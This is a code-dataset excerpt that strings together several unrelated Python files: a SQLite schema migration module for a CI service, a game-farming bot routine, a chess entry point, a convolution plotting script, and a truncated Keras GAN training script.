[version],\n )\n\n db.commit()\n\n migration_queue.append((version, inner))\n\n return inner\n\n return outer\n\n\n@auto_migrate(version=1)\ndef migrate_v1(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n CREATE TABLE sessions (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n uuid TEXT NOT NULL,\n git_sha TEXT,\n status TEXT NOT NULL DEFAULT 'SUCCESS'\n );\n\n CREATE TABLE git_commits (\n -- repo_url TEXT NOT NULL,\n sha TEXT NOT NULL,\n author_username TEXT NOT NULL,\n commit_message TEXT NOT NULL,\n committed_on TEXT NOT NULL\n );\n\n CREATE TABLE terminal_sessions (\n session_id TEXT PRIMARY KEY NOT NULL,\n lines TEXT NOT NULL\n );\n \"\"\"\n )\n\n\n@auto_migrate(version=2)\ndef migrate_v2(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n ALTER TABLE sessions ADD COLUMN started_at TEXT NOT NULL;\n ALTER TABLE sessions ADD COLUMN finished_at TEXT;\n \"\"\"\n )\n\n\n@auto_migrate(version=3)\ndef migrate_v3(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n ALTER TABLE git_commits\n ADD COLUMN repository TEXT NOT NULL\n DEFAULT 'dosisod/cicada2';\n \"\"\"\n )\n\n\n@auto_migrate(version=4)\ndef migrate_v4(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n UPDATE sessions\n SET status='FAILURE'\n WHERE finished_at IS NOT NULL AND status='PENDING';\n \"\"\"\n )\n\n\n@auto_migrate(version=5)\ndef migrate_v5(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n ALTER TABLE sessions\n ADD COLUMN trigger TEXT NOT NULL\n DEFAULT 'git.push';\n \"\"\"\n )\n\n\n@auto_migrate(version=6)\ndef migrate_v6(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n CREATE TABLE issues (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n -- TODO: use internal repo id instead of repo URL\n repo_url TEXT NOT NULL,\n platform_id TEXT NOT NULL,\n title TEXT NOT NULL,\n -- TODO: use author table instead of username\n submitted_by TEXT NOT NULL,\n is_locked INTEGER NOT NULL,\n opened_at TEXT NOT NULL,\n body TEXT NOT NULL\n );\n \"\"\"\n )\n\n\n@auto_migrate(version=7)\ndef migrate_v7(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"ALTER TABLE sessions ADD COLUMN issue_id INTEGER NULL;\"\n )\n\n\n@auto_migrate(version=8)\ndef migrate_v8(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n ALTER TABLE issues ADD COLUMN provider TEXT NOT NULL DEFAULT 'github';\n \"\"\"\n )\n\n\n@auto_migrate(version=9)\ndef migrate_v9(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n CREATE TABLE triggers (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n trigger TEXT NOT NULL,\n data TEXT NOT NULL\n );\n\n ALTER TABLE sessions ADD COLUMN trigger_id INTEGER NOT NULL;\n \"\"\"\n )\n\n\n@auto_migrate(version=10)\ndef migrate_v10(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n CREATE TABLE users (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n username TEXT NOT NULL,\n hash TEXT NOT NULL\n );\n \"\"\"\n )\n\n pw = MigrationSettings().default_admin_password\n hash = CryptContext(schemes=[\"bcrypt\"]).hash(pw)\n\n db.cursor().execute(\n \"INSERT INTO users (username, hash) VALUES (?, ?);\", [\"admin\", hash]\n )\n\n\n@auto_migrate(version=11)\ndef migrate_v11(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\"ALTER TABLE sessions DROP COLUMN git_sha;\")\n db.cursor().executescript(\"ALTER TABLE sessions DROP COLUMN issue_id;\")\n\n\n@auto_migrate(version=12)\ndef migrate_v12(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n CREATE TABLE github_sso_tokens (\n username TEXT NOT NULL,\n access_token TEXT NOT NULL,\n access_token_expires_at TEXT NOT NULL,\n refresh_token TEXT NOT NULL,\n refresh_token_expires_at TEXT NOT NULL,\n token_type TEXT NOT NULL,\n scope TEXT NOT NULL\n );\n \"\"\"\n )\n\n\n@auto_migrate(version=13)\ndef migrate_v13(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n CREATE TABLE repositories (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n provider TEXT NOT NULL,\n url TEXT NOT NULL\n );\n\n CREATE TABLE _user_repos (\n user_id INTEGER NOT NULL,\n repo_id INTEGER NOT NULL,\n perms TEXT NOT NULL\n );\n\n ALTER TABLE users\n ADD COLUMN is_admin INTEGER NOT NULL\n DEFAULT 0;\n\n ALTER TABLE users\n ADD COLUMN platform TEXT NOT NULL\n DEFAULT 'cicada';\n\n UPDATE users\n SET is_admin=1, platform='cicada'\n WHERE username='admin';\n \"\"\"\n )\n\n\n@auto_migrate(version=14)\ndef migrate_v14(db: sqlite3.Connection) -> None:\n db.cursor().executescript(\n \"\"\"\n CREATE UNIQUE INDEX ux_repositories_provider_url\n ON repositories(provider, url);\n\n CREATE UNIQUE INDEX ux_users_username_provider\n ON users(username, platform);\n \"\"\"\n )\n\n\n@auto_migrate(version=15)\ndef migrate_v15(db: sqlite3.Connection) -> None:\n rows = db.cursor().execute(\"SELECT * FROM triggers;\")\n\n for row in rows:\n id: int = row[0]\n trigger: str = row[1]\n data: dict[str, Any] = json.loads(row[2]) # type: ignore[misc]\n\n if trigger == \"git.push\":\n repository_url = data.pop(\"repository\")\n elif trigger == \"issue.open\":\n repository_url = data.pop(\"repo_url\")\n else:\n assert False\n\n data[\"repository_url\"] = repository_url\n\n db.cursor().execute(\n \"UPDATE triggers SET data=? WHERE id=?\",\n [json.dumps(data), id],\n )\n\n\n@auto_migrate(version=16)\ndef migrate_v16(db: sqlite3.Connection) -> None:\n rows = db.cursor().execute(\"SELECT * FROM triggers;\")\n\n for row in rows:\n id: int = row[0]\n trigger: str = row[1]\n data: dict[str, Any] = json.loads(row[2]) # type: ignore[misc]\n\n data[\"type\"] = trigger\n\n db.cursor().execute(\n \"UPDATE triggers SET data=? WHERE id=?\",\n [json.dumps(data), id],\n )\n\n\n@auto_migrate(version=17)\ndef migrate_v17(db: sqlite3.Connection) -> None:\n \"\"\"\n Grab all unique indexes from table, remove all rows, add unique constraint,\n and then add all the unique rows back in.\n \"\"\"\n\n # Using list() to eagerly grab all rows (because we are about to wipe them)\n rows = list(db.cursor().execute(\"SELECT DISTINCT * FROM _user_repos;\"))\n\n db.cursor().executescript(\n \"\"\"\n DELETE FROM _user_repos;\n\n CREATE UNIQUE INDEX IF NOT EXISTS ux_user_repos_user_id_repo_id\n ON _user_repos(user_id, repo_id);\n \"\"\"\n )\n\n for row in rows:\n user_id: int = row[0]\n repo_id: int = row[1]\n perms: str = row[2]\n\n db.cursor().execute(\n \"\"\"\n INSERT INTO _user_repos (user_id, repo_id, perms)\n VALUES (?, ?, ?);\n \"\"\",\n [user_id, repo_id, perms],\n )\n\n\n@auto_migrate(version=18)\ndef migrate_v18(db: sqlite3.Connection) -> None:\n def normalize_utc_timezones(date: str) -> str:\n \"\"\"\n Convert an ambiguous UTC datetime into an actual UTC datetime.\n Basically any datetime without a timezone is assumed to be a UTC\n datetime. For non UTC datetimes the offset will be kept in the form\n \"±XX:YY\". For UTC timezones, the \"+00:00\" will be replaced with \"Z\" to\n optimize string length.\n \"\"\"\n\n if date.endswith(\"UTC\"):\n # specifically for parsing Gitlab datetimes\n return str(\n datetime.strptime(date, \"%Y-%m-%d %H:%M:%S %Z\").replace(\n tzinfo=timezone.utc\n )\n ).replace(\"+00:00\", \"Z\")\n\n if date.endswith(\"Z\"):\n date.replace(\"Z\", \"+00:00\")\n\n d = datetime.fromisoformat(date)\n\n if not d.tzinfo:\n d = d.replace(tzinfo=timezone.utc)\n\n return str(d).replace(\"+00:00\", \"Z\")\n\n rows = db.cursor().execute(\"SELECT * FROM triggers;\")\n\n for row in rows:\n id: int = row[0]\n data: dict[str, Any] = json.loads(row[2]) # type: ignore[misc]\n\n datetime_fields = (\"committed_on\", \"opened_at\", \"closed_at\")\n\n for k, v in data.items():\n if k in datetime_fields:\n data[k] = normalize_utc_timezones(v)\n\n db.cursor().execute(\n \"UPDATE triggers SET data=? WHERE id=?\",\n [json.dumps(data, separators=(\",\", \":\")), id],\n )\n\n\n@auto_migrate(version=19)\ndef migrate_v19(db: sqlite3.Connection) -> None:\n db.executescript(\"DROP TABLE github_sso_tokens;\")\n\n\n@auto_migrate(version=20)\ndef migrate_v20(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE TABLE waitlist (\n submitted_at TEXT NOT NULL,\n email TEXT NOT NULL UNIQUE\n );\n \"\"\"\n )\n\n\n@auto_migrate(version=21)\ndef migrate_v21(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n ALTER TABLE users\n ADD COLUMN uuid TEXT NOT NULL DEFAULT 'invalid';\n \"\"\"\n )\n\n users = db.execute(\"SELECT id FROM users;\").fetchall()\n\n for (user_id,) in users:\n db.execute(\n \"UPDATE users SET uuid=? WHERE id=?\", [str(uuid4()), user_id]\n )\n\n db.commit()\n\n assert (\n db.execute(\n \"\"\"\n SELECT COUNT(id)\n FROM users\n WHERE uuid='invalid';\n \"\"\"\n ).fetchone()[0]\n == 0\n )\n\n db.cursor().executescript(\n \"CREATE UNIQUE INDEX IF NOT EXISTS ux_users_uuid ON users(uuid);\"\n )\n\n db.commit()\n\n\n@auto_migrate(version=22)\ndef migrate_v22(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n DROP TABLE git_commits;\n\n DROP TABLE issues;\n \"\"\"\n )\n\n\n@auto_migrate(version=23)\ndef migrate_v23(db: sqlite3.Connection) -> None:\n db.execute(\n \"\"\"\n ALTER TABLE sessions\n ADD COLUMN run_number INTEGER NOT NULL DEFAULT 1;\n \"\"\"\n )\n\n\n@auto_migrate(version=24)\ndef migrate_v24(db: sqlite3.Connection) -> None:\n db.execute(\"UPDATE terminal_sessions SET session_id=session_id || '#1';\")\n\n\n@auto_migrate(version=25)\ndef migrate_v25(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE TABLE env_vars (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n repo_id INTEGER NOT NULL,\n key TEXT NOT NULL,\n value TEXT NOT NULL\n );\n\n CREATE UNIQUE INDEX ux_env_vars_repo_id_key\n ON env_vars(repo_id, key);\n \"\"\"\n )\n\n\n@auto_migrate(version=26)\ndef migrate_v26(db: sqlite3.Connection) -> None:\n db.execute(\n \"\"\"\n ALTER TABLE env_vars\n ADD COLUMN \"order\" INTEGER NOT NULL DEFAULT 0;\n \"\"\"\n )\n\n\n@auto_migrate(version=27)\ndef migrate_v27(db: sqlite3.Connection) -> None:\n db.execute(\n \"\"\"\n UPDATE triggers\n SET data=json_insert(data, '$.ref', 'refs/heads/master')\n WHERE trigger = 'git.push';\n \"\"\"\n )\n\n\n@auto_migrate(version=28)\ndef migrate_v28(db: sqlite3.Connection) -> None:\n db.execute(\"ALTER TABLE users ADD COLUMN last_login TEXT;\")\n\n\n@auto_migrate(version=29)\ndef migrate_v29(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE TABLE installations (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n uuid TEXT NOT NULL,\n name TEXT NOT NULL,\n provider TEXT NOT NULL,\n scope TEXT NOT NULL\n );\n\n CREATE UNIQUE INDEX ux_installations_name_provider\n ON installations(name, provider);\n\n CREATE TABLE _installation_users (\n installation_id INTEGER NOT NULL,\n user_id INTEGER NOT NULL,\n perms TEXT NOT NULL\n );\n\n CREATE UNIQUE INDEX ux_installation_users\n ON _installation_users(installation_id, user_id);\n \"\"\"\n )\n\n\n@auto_migrate(version=30)\ndef migrate_v30(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n ALTER TABLE installations\n ADD COLUMN provider_id TEXT NOT NULL\n DEFAULT '';\n\n ALTER TABLE installations\n ADD COLUMN provider_url TEXT NOT NULL\n DEFAULT '';\n\n DROP INDEX ux_installations_name_provider;\n\n CREATE UNIQUE INDEX ux_installations_provider_info\n ON installations(name, provider, provider_id, provider_url);\n \"\"\"\n )\n\n\n@auto_migrate(version=31)\ndef migrate_v31(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE VIEW v_user_sessions AS\n SELECT\n u.id AS user_id,\n u.uuid AS user_uuid,\n u.username AS username,\n u.platform AS user_provider,\n r.id AS repo_id,\n r.url AS repo_url,\n s.id AS session_id,\n s.uuid AS session_uuid,\n s.status AS session_status,\n s.started_at AS session_started_at,\n s.finished_at AS session_finished_at,\n s.run_number AS session_run,\n t.data AS trigger_data\n FROM _user_repos ur\n JOIN repositories r ON r.id = ur.repo_id\n JOIN users u ON u.id = ur.user_id\n JOIN triggers t ON t.data->>'repository_url' = r.url\n JOIN sessions s ON s.trigger_id = t.id;\n \"\"\"\n )\n\n\n@auto_migrate(version=32)\ndef migrate_v32(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n DROP VIEW v_user_sessions;\n\n CREATE VIEW v_user_sessions AS\n SELECT\n u.id AS user_id,\n u.uuid AS user_uuid,\n u.username AS username,\n u.platform AS user_provider,\n r.id AS repo_id,\n r.url AS repo_url,\n ur.perms AS repo_perms,\n s.id AS session_id,\n s.uuid AS session_uuid,\n s.status AS session_status,\n s.started_at AS session_started_at,\n s.finished_at AS session_finished_at,\n s.run_number AS session_run,\n t.data AS trigger_data\n FROM _user_repos ur\n JOIN repositories r ON r.id = ur.repo_id\n JOIN users u ON u.id = ur.user_id\n JOIN triggers t ON t.data->>'repository_url' = r.url\n JOIN sessions s ON s.trigger_id = t.id;\n \"\"\"\n )\n\n\n@auto_migrate(version=33)\ndef migrate_v33(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE TABLE _installation_repos (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n installation_id INTEGER NOT NULL,\n repo_id INTEGER NOT NULL\n );\n\n CREATE UNIQUE INDEX ux_installation_repos_ids\n ON _installation_repos(installation_id, repo_id);\n\n CREATE VIEW v_session_runtime_metrics AS\n SELECT\n i.id AS installation_id,\n i.uuid AS installation_uuid,\n s.id AS session_id,\n s.uuid AS session_uuid,\n s.status AS session_status,\n s.started_at AS session_started_at,\n s.finished_at AS session_finished_at,\n s.run_number AS session_run,\n r.id AS repo_id,\n iif(\n s.finished_at IS NULL,\n -1,\n unixepoch(s.finished_at) - unixepoch(s.started_at)\n ) AS seconds\n FROM sessions s\n JOIN triggers t ON t.id = s.trigger_id\n JOIN repositories r ON r.url = t.data->>'repository_url'\n JOIN _installation_repos ir ON ir.repo_id = r.id\n JOIN installations i ON i.id = ir.installation_id\n \"\"\"\n )\n\n\n@auto_migrate(version=34)\ndef migrate_v34(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n ALTER TABLE repositories\n ADD COLUMN is_public INTEGER NOT NULL\n DEFAULT 0;\n\n DROP VIEW v_user_sessions;\n\n CREATE VIEW v_user_sessions AS\n SELECT\n u.id AS user_id,\n u.uuid AS user_uuid,\n u.username AS username,\n u.platform AS user_provider,\n r.id AS repo_id,\n r.url AS repo_url,\n r.is_public AS repo_is_public,\n ur.perms AS repo_perms,\n s.id AS session_id,\n s.uuid AS session_uuid,\n s.status AS session_status,\n s.started_at AS session_started_at,\n s.finished_at AS session_finished_at,\n s.run_number AS session_run,\n t.data AS trigger_data\n FROM _user_repos ur\n JOIN repositories r ON r.id = ur.repo_id\n JOIN users u ON u.id = ur.user_id\n JOIN triggers t ON t.data->>'repository_url' = r.url\n JOIN sessions s ON s.trigger_id = t.id;\n \"\"\"\n )\n\n\n@auto_migrate(version=35)\ndef migrate_v35(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE TABLE workflows (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n uuid TEXT UNIQUE NOT NULL,\n session_id TEXT NOT NULL,\n status TEXT NOT NULL,\n sha TEXT NOT NULL,\n filename TEXT NOT NULL,\n started_at TEXT NOT NULL,\n finished_at TEXT NULL,\n run_number INT NOT NULL,\n rerun_number INT NOT NULL\n );\n \"\"\"\n )\n\n sessions = db.execute(\n \"\"\"\n SELECT\n uuid,\n status,\n started_at,\n finished_at,\n trigger,\n trigger_id,\n run_number\n FROM sessions;\n \"\"\"\n ).fetchall()\n\n for session in sessions:\n db.execute(\n \"\"\"\n INSERT INTO workflows (\n uuid,\n session_id,\n status,\n sha,\n filename,\n started_at,\n finished_at,\n run_number,\n rerun_number\n ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);\n \"\"\",\n [\n str(uuid4()),\n session[\"uuid\"],\n session[\"status\"],\n session[\"trigger\"],\n \"\",\n session[\"started_at\"],\n session[\"finished_at\"],\n session[\"run_number\"],\n 1,\n ],\n )\n\n db.commit()\n\n\n@auto_migrate(version=36)\ndef migrate_v36(db: sqlite3.Connection) -> None:\n db.executescript(\"ALTER TABLE users ADD COLUMN email TEXT;\")\n\n\n@auto_migrate(version=37)\ndef migrate_v37(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE TABLE runners (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n uuid TEXT NOT NULL UNIQUE,\n installation_uuid TEXT NOT NULL,\n secret TEXT NOT NULL,\n groups TEXT NOT NULL\n );\n \"\"\"\n )\n\n\n@auto_migrate(version=38)\ndef migrate_v38(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n ALTER TABLE sessions\n ADD COLUMN run_on_self_hosted INT NOT NULL DEFAULT 0;\n\n ALTER TABLE workflows\n ADD COLUMN run_on_self_hosted INT NOT NULL DEFAULT 0;\n\n DROP VIEW v_user_sessions;\n\n CREATE VIEW v_user_sessions AS\n SELECT\n u.id AS user_id,\n u.uuid AS user_uuid,\n u.username AS username,\n u.platform AS user_provider,\n r.id AS repo_id,\n r.url AS repo_url,\n r.is_public AS repo_is_public,\n ur.perms AS repo_perms,\n s.id AS session_id,\n s.uuid AS session_uuid,\n s.status AS session_status,\n s.started_at AS session_started_at,\n s.finished_at AS session_finished_at,\n s.run_number AS session_run,\n t.data AS trigger_data,\n s.run_on_self_hosted as session_run_on_self_hosted\n FROM _user_repos ur\n JOIN repositories r ON r.id = ur.repo_id\n JOIN users u ON u.id = ur.user_id\n JOIN triggers t ON t.data->>'repository_url' = r.url\n JOIN sessions s ON s.trigger_id = t.id;\n \"\"\"\n )\n\n\n@auto_migrate(version=39)\ndef migrate_v39(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE TABLE cache_objects (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n uuid TEXT NOT NULL UNIQUE,\n repository_url TEXT NOT NULL,\n key TEXT NOT NULL,\n session_id INT NOT NULL,\n created_at TEXT NOT NULL\n );\n \"\"\"\n )\n\n\n@auto_migrate(version=40)\ndef migrate_v40(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n CREATE TABLE secrets (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n scope TEXT NOT NULL,\n repo_id INTEGER NULL,\n installation_uuid NULL,\n updated_at TEXT NOT NULL,\n key TEXT NOT NULL,\n ciphertext TEXT NOT NULL\n );\n\n CREATE UNIQUE INDEX ux_secrets\n ON secrets (\n scope,\n IFNULL(repo_id, -1),\n IFNULL(installation_uuid, ''),\n key\n );\n \"\"\"\n )\n\n\n@auto_migrate(version=41)\ndef migrate_v41(db: sqlite3.Connection) -> None:\n db.executescript(\n \"\"\"\n ALTER TABLE sessions\n ADD COLUMN title TEXT NULL;\n\n ALTER TABLE workflows\n ADD COLUMN title TEXT NULL;\n\n DROP VIEW v_user_sessions;\n\n CREATE VIEW v_user_sessions AS\n SELECT\n u.id AS user_id,\n u.uuid AS user_uuid,\n u.username AS username,\n u.platform AS user_provider,\n r.id AS repo_id,\n r.url AS repo_url,\n r.is_public AS repo_is_public,\n ur.perms AS repo_perms,\n s.id AS session_id,\n s.uuid AS session_uuid,\n s.status AS session_status,\n s.started_at AS session_started_at,\n s.finished_at AS session_finished_at,\n s.run_number AS session_run,\n t.data AS trigger_data,\n s.run_on_self_hosted as session_run_on_self_hosted,\n s.title as session_title\n FROM _user_repos ur\n JOIN repositories r ON r.id = ur.repo_id\n JOIN users u ON u.id = ur.user_id\n JOIN triggers t ON t.data->>'repository_url' = r.url\n JOIN sessions s ON s.trigger_id = t.id;\n \"\"\"\n )\n\n\ndef get_version(db: sqlite3.Connection) -> int:\n try:\n cursor = db.cursor()\n cursor.execute(\"SELECT version FROM _migration_version;\")\n\n return int(cursor.fetchone()[0])\n\n except sqlite3.OperationalError:\n return 0\n\n\ndef migrate(db: sqlite3.Connection) -> None:\n current_version = get_version(db)\n\n for migration_version, migration in migration_queue:\n if current_version < migration_version:\n migration(db)\n\n\nif __name__ == \"__main__\":\n # TODO: allow this to be configured\n db = sqlite3.connect(\"./db.db3\")\n db.row_factory = sqlite3.Row\n\n migrate(db)\n","repo_name":"Cicada-Software/cicada","sub_path":"cicada/api/infra/migrate.py","file_name":"migrate.py","file_ext":"py","file_size_in_byte":24419,"program_lang":"python","lang":"en","doc_type":"code","stars":504,"dataset":"github-code","pt":"37"} +{"seq_id":"1499931369","text":"from char import IChar\nfrom config import Config\nfrom logger import Logger\nfrom pather import Location, Pather\nfrom typing import Union\nfrom item.pickit import PickIt\nfrom template_finder import TemplateFinder\nfrom town.town_manager import TownManager\nfrom ui import UiManager\nfrom utils.misc import wait\n\n\nclass Pindle:\n def __init__(\n self,\n template_finder: TemplateFinder,\n pather: Pather,\n town_manager: TownManager,\n ui_manager: UiManager,\n char: IChar,\n pickit: PickIt\n ):\n self._config = Config()\n self._template_finder = template_finder\n self._pather = pather\n self._town_manager = town_manager\n self._ui_manager = ui_manager\n self._char = char\n self._pickit = pickit\n\n def approach(self, start_loc: Location) -> Union[bool, Location]:\n # Go through Red Portal in A5\n Logger.info(\"Run Pindle\")\n loc = self._town_manager.go_to_act(5, start_loc)\n if not loc:\n return False\n if not self._pather.traverse_nodes((loc, Location.A5_NIHLATHAK_PORTAL), self._char):\n return False\n wait(0.5, 0.6)\n found_loading_screen_func = lambda: self._ui_manager.wait_for_loading_screen(2.0)\n if not self._char.select_by_template([\"A5_RED_PORTAL\", \"A5_RED_PORTAL_TEXT\"], found_loading_screen_func, telekinesis=False):\n return False\n return Location.A5_PINDLE_START\n\n def battle(self, do_pre_buff: bool) -> Union[bool, tuple[Location, bool]]:\n # Kill Pindle\n if not self._template_finder.search_and_wait([\"PINDLE_0\", \"PINDLE_1\"], threshold=0.65, time_out=20).valid:\n return False\n if do_pre_buff:\n self._char.pre_buff()\n # move to pindle\n if self._char.can_teleport():\n self._pather.traverse_nodes_fixed(\"pindle_safe_dist\", self._char)\n else:\n if not self._pather.traverse_nodes((Location.A5_PINDLE_START, Location.A5_PINDLE_SAFE_DIST), self._char):\n return False\n self._char.kill_pindle()\n wait(0.2, 0.3)\n picked_up_items = self._pickit.pick_up_items(self._char)\n return (Location.A5_PINDLE_END, picked_up_items)\n","repo_name":"jagarop/botty-memread_lk","sub_path":"src/run/pindle.py","file_name":"pindle.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"8273811363","text":"\"\"\"\nCOMP.CS.100\nAuthor: Oskari Heinonen\n\nChess game with a gui.\n\nFeatures:\n - Can only make legal moves\n - Basic AI to play against\n - Customizable board\n - 2 player mode\n\nLimitations:\n - Can only play as white against AI\n - AI is stupid\n - No castling, en passant, or promotions\n - Doesn't recognize checkmates except usually for black when\n using defensive AI\n - Doesn't recognize stalemates\n\"\"\"\n\nfrom gui import *\nfrom game import *\n\ndef main():\n game = Game()\n gui = Gui(game)\n gui.start()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ozkarii/chess","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74106485548","text":"import sympy as sym\nimport itertools\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom scipy import linalg\nfrom printing import print_coeffs, print_matrix\nimport string\nRat = sym.Rational\nMat = sym.Matrix\nSym = sym.symbols\nHalf = Rat(1,2)\nThird = Rat(1,3)\nQuarter = Rat(1,4)\nfrom math import factorial, sqrt, sin\ndef Rec(n):\n return Rat(1, n)\nfrom plotting import plot_linspace_func\n\na = -5\nb = 5\n# f = sin\nf = lambda x: 1 if 0 <= x and x <= 1 else 0\ng = lambda x: abs(x)/2\nnodes = 100\ndt = (b - a)/(nodes - 1)\nplot_linspace_func(a, b, nodes, f)\nplot_linspace_func(a, b, nodes, g)\nplot_linspace_func(a, b, nodes, lambda x: sum(f(y)*g(x-y)*dt for y in np.linspace(a, b, nodes)))\n\nplt.show()\n\nns = [0,0,0, 1, 3, 1, -2, 8, 4, 0,0,0]\ndef get_ns(i):\n if i < 0 or i >= len(ns):\n return 0\n return ns[i]\ndiffs = [get_ns(i-1) - 2*get_ns(i) + get_ns(i+1) for i in range(len(ns))]\nprint(diffs)\nprint(sum(diffs))\n\n","repo_name":"LucasPayne/python_math","sub_path":"convolution.py","file_name":"convolution.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25080471371","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.layers import *\nfrom tensorflow.keras.models import Sequential\n\nOUT_DIR = './CNN_OUT_img/'\nif not os.path.exists(OUT_DIR):\n os.makedirs(OUT_DIR)\n\n# 변수 선언\nimg_shape = (28, 28, 1)\nepoch = 50000\nbatch_size = 128\nnoise = 100\nsample_interval = 100\n\n# 데이터 불러오기\n# train 데이터만 불러오기\n(X_train , _), (_, _) = mnist.load_data()\nprint(X_train.shape)\n\nX_train = X_train / 127.5 - 1 # -1 ~ 1 사이의 값을 가지도록 스케일링\nX_train = np.expand_dims(X_train, axis = 3) # 차원추가 (reshape와 같은 역할 수행)\nprint(X_train.shape)\n\n# build generator\ngenerator_model = Sequential()\ngenerator_model.add(Dense(256*7*7, input_dim=noise))\ngenerator_model.add(Reshape((7,7,256)))\n# Conv2DTranspose - 업 샘플링 이후 컨블루션\ngenerator_model.add(Conv2DTranspose(128, kernel_size=3,\n strides=2, padding='same'))\n# kernel_size:(3,3), stride=2 (2배로 업 샘플링)\ngenerator_model.add(BatchNormalization())\ngenerator_model.add(LeakyReLU(alpha=0.01))\n\ngenerator_model.add(Conv2DTranspose(64, kernel_size=3,\n strides=1, padding='same'))\ngenerator_model.add(BatchNormalization())\ngenerator_model.add(LeakyReLU(alpha=0.01))\n\n#이진분류기 마지막 레이어 1로 출력\n#strides: 커널을 씌울 떄 몇칸씩 이동하면서 씌울것인지, 실행하면 패딩을 줘도 사이즈가 줄어듬\ngenerator_model.add(Conv2DTranspose(1, kernel_size=3,\n strides=2, padding='same'))\ngenerator_model.add(Activation('tanh'))\n\ngenerator_model.summary()\n\n\n\n# build discriminator\ndiscriminator_model = Sequential()\ndiscriminator_model.add(Conv2D(32, kernel_size=3,\n strides=2, padding='same', input_shape=img_shape))\ndiscriminator_model.add(LeakyReLU(alpha=0.01))\n\ndiscriminator_model.add(Conv2D(64, kernel_size=3,\n strides=2, padding='same'))\n#discriminator_model.add(BatchNormalization())\ndiscriminator_model.add(LeakyReLU(alpha=0.01))\n\ndiscriminator_model.add(Conv2D(128, kernel_size=3,\n strides=2, padding='same'))\n#discriminator_model.add(BatchNormalization())\ndiscriminator_model.add(LeakyReLU(alpha=0.01))\n\ndiscriminator_model.add(Flatten())\ndiscriminator_model.add(Dense(1, activation='sigmoid'))\ndiscriminator_model.summary()\n\ndiscriminator_model.compile(loss='binary_crossentropy',\n optimizer='adam', metrics=['acc'])\ndiscriminator_model.trainable = False\n\n\n# build GAN\ngan_model = Sequential()\ngan_model.add(generator_model)\ngan_model.add(discriminator_model)\ngan_model.compile(loss='binary_crossentropy', optimizer='adam')\nprint(gan_model.summary())\n\n# real, fake label 생성\nreal = np.ones((batch_size, 1)) # 모든 값이 1인 행렬\nprint(real)\nfake = np.zeros((batch_size, 1)) # 모든 값이 0인 행렬\nprint(fake)\n\nfor itr in range(epoch):\n idx = np.random.randint(0, X_train.shape[0], batch_size) # 0 ~ 60000까지 128개\n real_imgs = X_train[idx] # 랜덤한 128개 이미지\n \n z = np.random.normal(size=(batch_size, noise)) # 정규분포 노이즈 (128, 100)\n fake_imgs = generator_model.predict(z) # generator가 noise로 생성한 이미지\n \n # batch size만큼 한번 학습\n d_hist_real = discriminator_model.train_on_batch(real_imgs, real)\n d_hist_fake = discriminator_model.train_on_batch(fake_imgs, fake)\n \n d_loss, d_acc = 0.5 * np.add(d_hist_real, d_hist_fake) # real과 fake의 평균 loss, accuracy\n\n #for i in range(5):\n z = np.random.normal(size=(batch_size, noise)) # 정규분포 노이즈 (128, 100)\n gan_hist = gan_model.train_on_batch(z, real) # fake img에 label은 real로\n \n if itr % sample_interval == 0: # 100번마다 출력\n print('%d [D loss: %f, acc.: %.2f%%] [G loss: %f]'%(\n itr, d_loss, d_acc*100, gan_hist))\n row = col = 4\n z = np.random.normal(size=(row*col, noise)) # (16, 100)\n fake_imgs = 